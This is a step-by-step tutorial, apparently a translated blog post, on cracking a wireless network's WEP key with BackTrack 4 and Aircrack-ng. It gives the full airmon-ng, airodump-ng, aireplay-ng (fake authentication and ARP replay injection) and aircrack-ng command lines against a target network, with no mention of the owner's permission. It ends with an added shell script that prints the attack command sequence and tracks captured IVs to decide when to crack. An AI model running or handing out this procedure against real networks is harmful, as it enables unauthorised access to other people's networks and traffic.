Cracking a WEP key with BackTrack 4
BackTrack is a Linux distribution designed for wireless auditing and computer security in general, now in its fourth version. Unlike most other distributions, it ships with more than 300 security applications, among them the Aircrack-ng suite. There is a Windows version of Aircrack-ng, but it does not work with most wireless cards: a special driver would have to be written for each card so that it could capture and inject frames, and that is beyond the reach of the average user. Aircrack-ng is a set of tools that recovers a WEP key once enough encrypted packets (more precisely, enough distinct initialisation vectors, or IVs) have been captured from the network that uses it.
To get BackTrack 4, download the ISO from the official web site and burn it to a DVD. You can also install it on a USB flash drive of at least 2 GB with the UNetbootin tool, or run it in a virtual machine (VMware), but we leave those options to more advanced users. Speaking of users, I have to make clear that this tutorial is aimed at people with basic Linux knowledge, that is, who can at least get around in a console (shell). If you do not know what I am talking about, better stop reading here and ask the nearest computer expert for help.
Once we have the BackTrack DVD, or in my case the USB stick, boot from it and choose the default option. I will not explain how to boot from a DVD, since there are many online guides on changing the boot order in the BIOS. When the system has started, if a login is requested the user is "root" and the default BackTrack password is "toor". Then type "startx" and press Enter to start the graphical environment. BackTrack 4 comes with the KDE 3.5 desktop. Personally I do not like it, I prefer GNOME, but that is a matter of taste.
The first thing to check is that each key on the keyboard prints the character written on it. If not, select the keyboard layout that fits your keyboard. The default layout is US, which caused me problems: pressing the hyphen key, for example, printed a different character. At the bottom right there is an icon with a flag that changes the keyboard layout when clicked. Since my own layout was not among the options, I chose German, which amounts to the same configuration for my purposes. With that little problem solved, we can start with what really interests us.
The first thing is to check that the system has detected the wireless card. Open a console and run "ifconfig" (or "iwconfig", which lists only the wireless interfaces). You get a list of the network interfaces in the PC; wireless ones usually have names like wifi0, ath0 or, most commonly, wlan0. To verify that the card works, run airodump-ng followed by the interface name, for example "airodump-ng wlan0". If all goes well, a list of the wireless networks within range appears, with the access point's MAC address (BSSID), channel (CH), network name (ESSID), encryption (WEP/WPA) and other useful information. If you do not see this, it is probably because the system does not support your wireless card. Take note of the data of the network whose WEP key we want to recover (BSSID, channel and ESSID) and close the console.
Open a new console and run "airmon-ng start wlan0 6", where "6" is the channel of the target network. This command puts the wifi card into monitor mode on the specified channel; 2.4 GHz channels run from 1 to 13 in Europe (1 to 11 in the US). If your card is supported you will see a message like "(monitor mode enabled on mon0)". Two things can happen when entering monitor mode: either the interface keeps its name (wifi0/ath0/wlan0), or a new interface with a new name is created that runs in monitor mode. In my case a new interface named "mon0" is created, and that is the one we work with from now on.
Almost always, the main problem when monitoring wireless networks in Linux is the driver for the card: either there is no driver at all, or there is one but it does not support monitor mode and packet injection. My wifi card is a Realtek RTL8187B, and before BackTrack 4 was released there was no driver that really worked with it. So if your card is not supported now, you will probably have to wait for drivers in a future BackTrack version, or buy a card that is supported.
Once the card is in monitor mode, the next step is to run "airodump-ng -w key -c 6 mon0". This keeps saving all the packets seen on channel 6 (-c 6) to files whose names start with "key". With the -w option you give the path and name prefix of the files where the packets are stored; airodump-ng adds a number and an extension, so the capture ends up in "key-01.cap" (with a "key-01.csv" summary of the networks next to it). If you do not give a path, the files are saved in the current directory, which in my case was the desktop. Keep in mind that when you shut down the live system the .cap file is lost, so copy it to your hard disk. If other networks share the channel, you can add "--bssid" followed by the target's MAC address so that only its traffic is captured and counted. If you end up with several .cap files from different captures, they can be combined, as explained later.
Open a new console and leave the previous one running so that it keeps collecting the wifi traffic. Now the real work begins. Run "aireplay-ng -1 30 -e WLAN_32 -a e0:91:53:23:cd:99 -h 00:21:63:04:54:4d mon0". This is a fake authentication (-1) with the access point, repeated every 30 seconds, so that the AP accepts frames coming from our MAC address; when it works you see "Association successful :-)". Replace "WLAN_32" with the network name. Watch upper and lower case, because otherwise it will not work, and if the name contains spaces put it in quotes. Where it says "e0:91:53:23:cd:99" put the MAC address (BSSID) of the wifi network, and where it says "00:21:63:04:54:4d" put the MAC address of your own wifi card. An easy way to find out your card's MAC from Windows is to run "ipconfig /all" in a command prompt (CMD); in BackTrack, "ifconfig wlan0" shows it in the HWaddr field.
The next step is to run, in yet another new console, "aireplay-ng -3 -b e0:91:53:23:cd:99 -h 00:21:63:04:54:4d -x 600 mon0". This is the ARP request replay attack (-3): aireplay-ng waits for an ARP packet on the network and re-sends it at up to 600 packets per second (-x 600); every replayed packet makes the access point answer with a new encrypted frame, and therefore a new IV. This is what is known as injection. From now on, watch the "#Data" column in the first console, which shows the number of data packets (IVs) captured from each network. With the PTW attack used by aircrack-ng 0.9 and later, a 64-bit WEP key (40 secret bits) usually falls with around 20,000 IVs and a 128-bit key (104 secret bits) with around 40,000, although sometimes more are needed; more IVs never hurt. The process can take between 10 minutes and 3 hours, depending on the signal quality and on whether someone is using the network, that is, whether there is traffic: without a client sending at least one ARP packet there is nothing to replay. If nothing works, it may be because some wifi routers are protected against injection.
When the number of captured IVs approaches the number needed, open a new console and run "aircrack-ng key-01.cap". This lists the networks found in the capture together with the number of IVs captured for each. Select the target network and aircrack-ng starts recovering the key. Despite what is often said, this is not brute force over all possible keys (2^40 for 64-bit WEP and 2^104 for 128-bit, far too many to try): aircrack-ng runs statistical attacks (PTW by default, or FMS/KoreK with -K) that exploit weaknesses in the way WEP uses RC4, ranking the likely value of each key byte from the captured IVs and then testing the best candidates against the capture. How long it takes therefore depends on the number of captured IVs (the more, the better) and on the speed of the processor. The result is shown as "KEY FOUND!" followed by the key bytes in hex (10 hex digits for a 64-bit key, 26 for a 128-bit key), and also as ASCII when it is printable; the hex form is what you type into the wifi client.
Finally, I should add that if you have several .cap files from earlier captures, aircrack-ng can combine them. So if, for example, you are unlucky enough that your card injects very slowly and you only manage to capture 5,000 IVs, which is not enough to recover the key, you can try again another day, capture another 5,000, and then run "aircrack-ng key-01.cap key-02.cap key-03.cap ...". aircrack-ng adds up all the IVs belonging to the same network (same BSSID) across the files and recovers the WEP key, as long as the key has not been changed in between.
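The whole procedure, as an added shell example that is not code from the original post: it validates the values you paste into the commands above, prints the corrected command sequence, and reads the CSV summary that airodump-ng writes next to the .cap file to tell you when enough IVs are in to start aircrack-ng. The airodump-ng CSV column order assumed here (Privacy in column 6, "# IV" in column 11, ESSID in column 14) and the PTW thresholds are taken from the aircrack-ng documentation; the CSV contents are constructed, not a real capture, and the helper names (is_mac, attack_commands, wep_networks, enough_ivs) are mine.

```sh
#!/bin/sh
# wep_helpers.sh: helpers around the airodump-ng/aireplay-ng/aircrack-ng
# workflow in the tutorial. Added example, not from the original post.

# A MAC address is six colon-separated hex pairs, e.g. e0:91:53:23:cd:99.
is_mac() {
    printf '%s\n' "$1" | grep -Eqi '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# The whole 2.4 GHz range is 1-14; Europe uses 1-13, the US 1-11, Japan 14.
is_channel() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# Rough IV count the PTW attack (aircrack-ng 0.9+) needs per key size.
# Assumed from the aircrack-ng documentation; more IVs only make it faster.
ivs_needed() {
    case "$1" in
        64)  echo 20000 ;;
        128) echo 40000 ;;
        *)   return 1 ;;
    esac
}

# Print the command sequence from the tutorial with the pasted values checked.
# The ESSID is quoted so that names containing spaces survive.
attack_commands() {  # essid bssid our_mac channel iface prefix
    is_mac "$2" && is_mac "$3" && is_channel "$4" || return 1
    printf 'airodump-ng -c %s --bssid %s -w %s %s\n' "$4" "$2" "$6" "$5"
    printf 'aireplay-ng -1 30 -e "%s" -a %s -h %s %s\n' "$1" "$2" "$3" "$5"
    printf 'aireplay-ng -3 -b %s -h %s -x 600 %s\n' "$2" "$3" "$5"
    printf 'aircrack-ng %s-01.cap\n' "$6"
}

# Print "BSSID ESSID #IV" for every WEP access point in an airodump-ng CSV.
# Assumed layout: Privacy is column 6, "# IV" column 11, ESSID column 14, and
# the access-point table ends at the blank line before the station table.
wep_networks() {
    awk -F', *' '
        /^BSSID,/           { in_ap = 1; next }
        in_ap && NF < 2     { exit }
        in_ap && $6 ~ /WEP/ { print $1, $14, $11 }
    ' "$1"
}

# IVs captured so far for one BSSID (0 if the AP is not in the file).
ivs_for() {  # csv bssid
    wep_networks "$1" | awk -v b="$2" 'tolower($1) == tolower(b) { n = $3 }
                                        END { print n + 0 }'
}

# Succeed when the capture holds enough IVs to try aircrack-ng on this AP.
enough_ivs() {  # csv bssid keybits
    have=$(ivs_for "$1" "$2") || return 1
    want=$(ivs_needed "$3") || return 1
    [ "$have" -ge "$want" ]
}

# Constructed sample in airodump-ng's CSV layout, NOT a real capture.
SAMPLE_CSV=$(mktemp)
trap 'rm -f "$SAMPLE_CSV"' EXIT
cat > "$SAMPLE_CSV" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
E0:91:53:23:CD:99, 2009-06-01 10:00:00, 2009-06-01 10:42:00,  6,  54, WEP , WEP, OPN, -61,  1200,  23456,   0.  0.  0.  0,   7, WLAN_32, 
00:1A:2B:3C:4D:5E, 2009-06-01 10:00:00, 2009-06-01 10:42:00, 11,  54, WPA2, CCMP, PSK, -70,   900,      0,   0.  0.  0.  0,   6, Office, 
00:0C:42:11:22:33, 2009-06-01 10:01:00, 2009-06-01 10:42:00,  6,  54, WEP , WEP, OPN, -80,   400,   1800,   0.  0.  0.  0,   5, Cafe1, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:21:63:04:54:4D, 2009-06-01 10:05:00, 2009-06-01 10:42:00, -50, 30000, E0:91:53:23:CD:99, 
EOF

# Usage: list the WEP networks in the capture and, if WLAN_32 has enough IVs
# for a 64-bit key, print the command sequence to run against it.
wep_networks "$SAMPLE_CSV"
if enough_ivs "$SAMPLE_CSV" e0:91:53:23:cd:99 64; then
    attack_commands WLAN_32 e0:91:53:23:cd:99 00:21:63:04:54:4d 6 mon0 key
fi
```

On a live capture, point wep_networks and enough_ivs at the real key-01.csv instead of the constructed sample; the IV count it reports is the same "#Data" figure you watch in the airodump-ng console, so you can poll it from a script rather than staring at the screen.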